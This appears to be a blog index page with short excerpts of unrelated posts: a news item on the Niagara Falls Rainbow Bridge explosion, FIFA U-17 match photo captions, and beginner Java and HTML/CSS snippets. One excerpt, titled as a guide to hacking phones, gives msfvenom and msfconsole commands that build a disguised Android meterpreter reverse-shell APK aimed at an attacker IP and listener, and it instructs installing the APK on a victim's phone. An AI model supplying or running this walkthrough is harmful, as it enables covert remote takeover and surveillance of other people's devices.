Posts

US-Canada bridge expected to reopen in day or two, says mayor Jim Diodati

Image
  The Federal Bureau of Investigation ended its probe after finding no evidence that it was a terror attack. The Canadian mayor of Niagara Falls, Jim Diodati, said the Rainbow Bridge is expected to reopen in a day or two, after a car explosion that killed two people shuttered the busy crossing between the US and Canada. “The damage as we understand it is superficial as far as the bridge is concerned,” Diodati said Thursday in an interview, adding that US authorities will make the decision on when to reopen the bridge. One of the booths on the bridge is damaged, but there are other booths available for travelers to drive through, he said, citing discussions with police officials. The Federal Bureau of Investigation ended its probe after finding no evidence that it was a terror attack, the Associated Press reported Thursday, citing a statement from the bureau’s Buffalo office. It added that a search of the scene revealed no explosive materials. About 1.5 million passenger vehicles cr...

FIFA U-17 World Cup: Ecuador vs. Brazil

Image
  Estevao (front) of Brazil competes during the round of 16 match of the FIFA U-17 World Cup Indonesia 2023 between Ecuador and Brazil at Manahan Stadium in Surakarta, Central Java, Indonesia, Nov. 20, 2023. (Photo by Yanuar/Xinhua)                               Luighi (2nd L) of Brazil celebrates scoring during the round of 16 match of the FIFA U-17 World Cup Indonesia 2023 between Ecuador and Brazil at Manahan Stadium in Surakarta, Central Java, Indonesia, Nov. 20, 2023. (Photo by Yanuar/Xinhua) Estevao of Brazil celebrates scoring during the round of 16 match of the FIFA U-17 World Cup Indonesia 2023 between Ecuador and Brazil at Manahan Stadium in Surakarta, Central Java, Indonesia, Nov. 20, 2023. (Photo by Yanuar/Xinhua)

Milicious App For hacking phones using metasploit!!

Image
Creating a milicious payload for mobile hacking using metasploit     Required:  Min 4GB Ram Laptop/Computer  Kali Linux  1.Use cmd on linux: msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.29.209 lport=1234 R>security.apk here,lhost is a attacker IP, lport is a listening port of a attacker. Note:The Attack is performing on a home network. We created the apk successfully.. 2. Download and Install the app on victim phone. (Security.apk) that we have created. 3.In kali linux for listening use cmd:          Follow some cmd in sequence: msfconsole use multi/handler set payload android/meterpreter/reverse_tcp set lhost 192.168.29.209 set lport 1234 exploit     msfconsole setup exploit started followed above steps. Great!!Connection established. Some Command that can be performed under msfconsole:    Command                   Description     -------...

4 digit OTP Generator!!

Image
 Randomly Generating OTP using Java.. Code:- import java.lang.Math; class otp{ public static void main(String[] args){ System.out.println((int)(Math.random()*10000)); } } Output:- ThankYou!Keep Learning..🔥

Create a cool login page using HTML+CSS!!..😍

Image
This login page includes a form where users can input their username and password, as well as a button to submit the form. Using HTML+CSS🔥 Code:- <! DOCTYPE html > < html lang = "en" > < head >     < meta charset = "UTF-8" >     < meta http-equiv = "X-UA-Compatible" content = "IE=edge" >     < meta name = "viewport" content = "width=device-width, initial-scale=1.0" >     < title > Login </ title >     < style >         form {             text-align : center ;             background-color : black ;             color : white ;             margin-left : 100px ;             margin-right : 100px ;             margin-top : 100px ;         }       ...

Create a Java program Where number is generated between 1-100 guess the number until you find it!!🔥

Image
Mini Project Generate a  random number  between 1-100 Ask the user to guess the number Until the user Find it.If the user fails to find the number use -1 to check what the number was generated. Code in java Language:- import java.lang.Math; import java.util.Scanner;  class project{ public static void main(String[] args){ Scanner sc= new Scanner(System.in); int ran=(int)(Math.random()*100); int user_num; int i; while(true){ user_num=sc.nextInt(); if(user_num==-1){ System.out.println("Random number "+ran); break; } if(ran==user_num){ System.out.println("Great!you find the number is " +ran); break; } else if(user_num<ran){ System.out.println("Sorry!the number is input less"); } else if(user_num>ran){ System.out.println("Sorry!the number is input more");                }           }      } } Output:- ThankYou!Keep Learning..🔥